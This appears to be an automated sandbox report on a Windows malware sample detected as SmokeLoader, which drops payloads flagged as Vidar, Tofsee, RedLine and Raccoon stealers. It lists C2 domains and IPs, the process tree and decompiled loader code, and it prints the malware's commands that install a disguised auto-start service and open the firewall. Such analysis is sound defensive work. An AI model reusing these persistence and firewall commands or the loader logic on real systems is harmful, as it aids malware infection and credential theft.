yivbbwxtct.com

dqwogmqhb.com

cvhsbw.com

oyghbp.com

yuvwrs.com

xkujdf.net

fyyanes.com

tyjpjf.org

rsxrkuta.org

jlgqjcjkdy.net

avcxisfo.org

mvsed.org

pgctyuwy.net

surulybuu.org

thylpwqt.org

rhglrb.org

dbxsgfe.org

a0621298.xsph.ru

aoavvcteey.com

tqnyuoui.net

nqlstnrw.org

cbwqss.org

toosx.com

dokqsat.net

pipoxpya.com

wbrirc.com

185.215.113.35

dwskrgjp.com

pwahu.net

xnfmckfat.org

185.163.204.22

htagjvn.org

185.163.204.24

nadbxcytci.net

wvnyptv.com

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: U3E7zMaux2.exe PID: 6688 Parent PID: 3512

General

Start time:	00:14:26
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\U3E7zMaux2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\U3E7zMaux2.exe"
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: U3E7zMaux2.exe PID: 6728 Parent PID: 6688

General

Start time:	00:14:28
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\U3E7zMaux2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\U3E7zMaux2.exe"
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6728

General

Start time:	00:14:35
Start date:	14/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2480 Parent PID: 568

General

Start time:	00:14:36
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6140 Parent PID: 568

General

Start time:	00:14:56
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: uufaeea PID: 2804 Parent PID: 968

General

Start time:	00:15:09
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Roaming\uufaeea
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\uufaeea
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: uufaeea PID: 6944 Parent PID: 2804

General

Start time:	00:15:12
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Roaming\uufaeea
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\uufaeea
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5444 Parent PID: 568

General

Start time:	00:15:12
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: D984.exe PID: 5756 Parent PID: 3424

General

Start time:	00:15:12
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\D984.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D984.exe
Imagebase:	0x400000
File size:	301056 bytes
MD5 hash:	277680BD3182EB0940BC356FF4712BEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 5680 Parent PID: 568

General

Start time:	00:15:15
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5788 Parent PID: 5680

General

Start time:	00:15:16
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
Imagebase:	0x1240000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: E666.exe PID: 4780 Parent PID: 3424

General

Start time:	00:15:16
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\E666.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E666.exe
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 6712 Parent PID: 5756

General

Start time:	00:15:19
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
Imagebase:	0x1240000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: E666.exe PID: 4388 Parent PID: 4780

General

Start time:	00:15:20
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\E666.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E666.exe
Imagebase:	0x400000
File size:	294400 bytes
MD5 hash:	8362E0F91AE3379C73422BBCA7BAC493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 7CA1.exe PID: 5352 Parent PID: 3424

General

Start time:	00:15:21
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7CA1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7CA1.exe
Imagebase:	0x400000
File size:	327680 bytes
MD5 hash:	3754DB9964B0177B6E905999B6F18FD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: 86C4.exe PID: 1368 Parent PID: 3424

General

Start time:	00:15:23
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\86C4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\86C4.exe
Imagebase:	0x400000
File size:	313344 bytes
MD5 hash:	B11C5DEFDBA76C2B3EE67EE1B474389D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: 8EC4.exe PID: 6024 Parent PID: 3424

General

Start time:	00:15:25
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\8EC4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8EC4.exe
Imagebase:	0xfa0000
File size:	537088 bytes
MD5 hash:	D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: cmd.exe PID: 5208 Parent PID: 1368

General

Start time:	00:15:28
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6000 Parent PID: 5208

General

Start time:	00:15:28
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6392 Parent PID: 1368

General

Start time:	00:15:29
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6916 Parent PID: 6392

General

Start time:	00:15:29
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sc.exe PID: 3496 Parent PID: 1368

General

Start time:	00:15:30
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase:	0x150000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4936 Parent PID: 568

General

Start time:	00:15:30
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 1496 Parent PID: 3496

General

Start time:	00:15:30
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sc.exe PID: 1716 Parent PID: 1368

General

Start time:	00:15:31
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
Imagebase:	0x150000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5416 Parent PID: 1716

General

Start time:	00:15:32
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: sc.exe PID: 4728 Parent PID: 1368

General

Start time:	00:15:32
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\sc.exe" start shayesoq
Imagebase:	0x150000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5236 Parent PID: 4728

General

Start time:	00:15:33
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: lagavljy.exe PID: 4544 Parent PID: 568

General

Start time:	00:15:33
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\shayesoq\lagavljy.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe"
Imagebase:	0x400000
File size:	10543104 bytes
MD5 hash:	7A36C0AD3083A1519CCE3A67BB377D18
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: netsh.exe PID: 5988 Parent PID: 1368

General

Start time:	00:15:33
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase:	0x9f0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5560 Parent PID: 5988

General

Start time:	00:15:34
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5940 Parent PID: 4544

General

Start time:	00:15:37
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	svchost.exe
Imagebase:	0xfc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: 8EC4.exe PID: 6240 Parent PID: 6024

General

Start time:	00:15:40
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\8EC4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8EC4.exe
Imagebase:	0x610000
File size:	537088 bytes
MD5 hash:	D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: 7801.exe PID: 7032 Parent PID: 3424

General

Start time:	00:15:51
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\7801.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7801.exe
Imagebase:	0x400000
File size:	905216 bytes
MD5 hash:	852D86F5BC34BF4AF7FA89C60569DF13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: U3E7zMaux2.exe PID: 6688 Parent PID: 3512 U3E7zMaux2.exeCOMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	2.2%
Signature Coverage:	6.1%
Total number of Nodes:	1839
Total number of Limit Nodes:	41

Executed Functions

Function 004017B8, Relevance: 54.4, APIs: 22, Strings: 9, Instructions: 185
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E004017B8(void* __edx, void* __fp0) {
				signed int _v32;
				struct _SECURITY_ATTRIBUTES* _v40;
				char _v1060;
				char _v2084;
				char _v3096;
				char _v3108;
				struct _OSVERSIONINFOA _v3260;
				void* _v3276;
				void _v3280;
				intOrPtr _v3296;
				struct _SECURITY_ATTRIBUTES* _v3300;
				WCHAR* _v3312;
				short _v3316;
				char _v3320;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				intOrPtr _t32;
				void* _t37;
				void* _t38;
				intOrPtr* _t67;
				intOrPtr* _t69;
				WCHAR* _t73;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t92;
				signed int _t93;
				signed int _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				void* _t111;

				_t111 = __fp0;
				_t81 = __edx;
				_t94 = _t93 & 0xfffffff8;
				_push(0xffffffff);
				_push(E00412F96);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t94;
				_t95 = _t94 - 0xcd0;
				_push(_t87);
				_t73 = 0;
				_t98 =  *0x43ed0c - 0x20a;
				if( *0x43ed0c == 0x20a) {
					SetComputerNameW(L"Zeyu tuvu vegud rayuz");
					EnumSystemLocalesW(0, 0);
					__imp__GetConsoleAliasesA( &_v3096, 0, 0);
					FindResourceExA(0, "fofako", "cimojudozuwelam", 0);
					GetVersionExA( &_v3260);
					VirtualQuery(0, 0, 0);
					CreateThread(0, 0, 0, 0, 0, 0);
					__imp__SetComputerNameExW(0, L"Puvehocusegaw nomexu dawovegubiteyeg lifezeri baju");
					_push("runexobozez");
					E004028A6(0, _t81, 0x43bc48, _t87, _t98);
					_t79 = 0x43bc48;
					_v3296 = 7;
					_v3300 = 0;
					_v3316 = 0;
					E00401D8D( &_v3320, 6);
					_v40 = 0;
					E004026A4(0, _t81, 0x43bc48, 0);
					 *_t95 = 0x929;
					_push(0xea);
					E00402615(_t79, _t98);
					E00402853(0, 0, "0.txt", "rb");
					_t96 = _t95 + 0x14;
					E00402E41(0, _t81, 0x43bc48,  &_v3320, _t98);
					_t67 = _t96;
					 *_t67 = 0;
					 *((intOrPtr*)(_t67 + 4)) = 0;
					E00403010(_t81, 0);
					st0 = _t111;
					_t69 = _t96;
					 *_t69 = 0;
					 *((intOrPtr*)(_t69 + 4)) = 0;
					E00402980(0, 0);
					st0 = _t111;
					_v40 = _v40 | 0xffffffff;
					E00401BEE(0, 0x43bc48,  &_v3320, _t92, 1, 0);
				}
				_t88 = 0;
				while(1) {
					__imp__GetConsoleAliasA(_t73, _t73, _t73, _t73);
					if(_t88 > 0x90ce655) {
						break;
					}
					_t88 = _t88 + 1;
					if(_t88 < 0x7048dce2) {
						continue;
					}
					break;
				}
				E00401789();
				 *0x43e7fc = GetModuleHandleA(0x43bc48);
				_t30 = LocalAlloc(_t73,  *0x43ed0c); // executed
				 *0x43e7f8 = _t30;
				E0040179D();
				_t32 =  *0x41a604; // 0x3802dd
				_t84 = 0;
				 *0x4400fc = _t32;
				if( *0x43ed0c > _t73) {
					do {
						 *((char*)( *0x43e7f8 + _t84)) =  *((intOrPtr*)( *0x4400fc + _t84 + 0xb2d3b));
						if( *0x43ed0c == 0x44) {
							GetConsoleTitleA( &_v3108, _t73);
						}
						_t84 = _t84 + 1;
					} while (_t84 <  *0x43ed0c);
				}
				_v3312 = _t73;
				do {
					_t75 = _v3312;
					if(_v3312 +  *0x43ed0c == 0x5e) {
						GetConsoleTitleA( &_v2084, _t73);
						GetAtomNameA(_t73,  &_v1060, _t73);
						_v3280 = _t73;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						CreateIoCompletionPort(_t73,  &_v3280, _t73, _t73);
						GetFileAttributesW(L"vofazegekasu");
						GetDefaultCommConfigW(_t73, _t73, _t73);
					}
					_v3312 =  &(_v3312[0]);
				} while (_v3312 < 0x40c893);
				E0040169C();
				do {
					if(_t73 == 0xc06) {
						E0040176F(_t75);
					}
					_t73 =  &(_t73[0]);
				} while (_t73 < 0x246b35);
				_t37 =  *0x43e7f8;
				 *0x43ed00 = _t37;
				_t38 =  *_t37();
				 *[fs:0x0] = _v32;
				return _t38;
			}

0x004017b8
0x004017b8
0x004017bb
0x004017c4
0x004017c6
0x004017cb
0x004017cc
0x004017d3
0x004017da
0x004017db
0x004017dd
0x004017ed
0x004017f8
0x00401800
0x00401810
0x00401822
0x0040182d
0x00401836
0x00401842
0x0040184e
0x00401854
0x0040185a
0x00401860
0x00401869
0x00401871
0x00401875
0x0040187a
0x00401880
0x00401887
0x0040188c
0x00401893
0x00401898
0x004018a8
0x004018ad
0x004018b3
0x004018b9
0x004018bb
0x004018bd
0x004018c0
0x004018c5
0x004018c7
0x004018c9
0x004018cb
0x004018ce
0x004018d3
0x004018d5
0x004018e3
0x004018e3
0x004018e8
0x004018ea
0x004018ee
0x004018fa
0x00000000
0x00000000
0x004018fc
0x00401903
0x00000000
0x00000000
0x00000000
0x00401903
0x00401905
0x00401917
0x0040191d
0x00401923
0x00401928
0x0040192d
0x00401938
0x0040193a
0x00401945
0x00401947
0x00401959
0x00401963
0x0040196e
0x0040196e
0x00401970
0x00401971
0x00401947
0x00401979
0x0040197d
0x00401982
0x0040198b
0x00401996
0x004019a2
0x004019aa
0x004019b2
0x004019b3
0x004019b4
0x004019b6
0x004019be
0x004019c9
0x004019d2
0x004019d2
0x004019d8
0x004019dc
0x004019e6
0x004019eb
0x004019f1
0x004019f3
0x004019f3
0x004019f8
0x004019f9
0x00401a01
0x00401a06
0x00401a0b
0x00401a16
0x00401a21

APIs

SetComputerNameW.KERNEL32(Zeyu tuvu vegud rayuz), ref: 004017F8
EnumSystemLocalesW.KERNEL32(00000000,00000000), ref: 00401800
GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 00401810
FindResourceExA.KERNEL32(00000000,fofako,cimojudozuwelam,00000000), ref: 00401822
GetVersionExA.KERNEL32(?), ref: 0040182D
VirtualQuery.KERNEL32(00000000,00000000,00000000), ref: 00401836
CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401842
SetComputerNameExW.KERNEL32(00000000,Puvehocusegaw nomexu dawovegubiteyeg lifezeri baju), ref: 0040184E
_printf.LIBCMT ref: 0040185A
_malloc.LIBCMT ref: 00401887

Part of subcall function 004026A4: __FF_MSGBANNER.LIBCMT ref: 004026C7
Part of subcall function 004026A4: __NMSG_WRITE.LIBCMT ref: 004026CE
Part of subcall function 004026A4: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00409F64,00000001,00000001,00000001,?,00404137,00000018,004179E8,0000000C,004041C8), ref: 0040271B

_calloc.LIBCMT ref: 00401898

Part of subcall function 00402615: __calloc_impl.LIBCMT ref: 0040262A

__wfopen_s.LIBCMT ref: 004018A8
_fseek.LIBCMT ref: 004018B3
GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004018EE
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040190B
LocalAlloc.KERNELBASE(00000000), ref: 0040191D
GetConsoleTitleA.KERNEL32(?,00000000), ref: 0040196E
GetConsoleTitleA.KERNEL32(?,00000000), ref: 00401996
GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004019A2
CreateIoCompletionPort.KERNEL32(00000000,?,00000000,00000000), ref: 004019BE
GetFileAttributesW.KERNEL32(vofazegekasu), ref: 004019C9
GetDefaultCommConfigW.KERNEL32 ref: 004019D2

Strings

cimojudozuwelam, xrefs: 00401817
vofazegekasu, xrefs: 004019C4
kernel32.dll, xrefs: 004017E8, 00401859, 0040190A
fofako, xrefs: 0040181C
5k$, xrefs: 004019F9
Zeyu tuvu vegud rayuz, xrefs: 004017F3
0.txt, xrefs: 004018A2
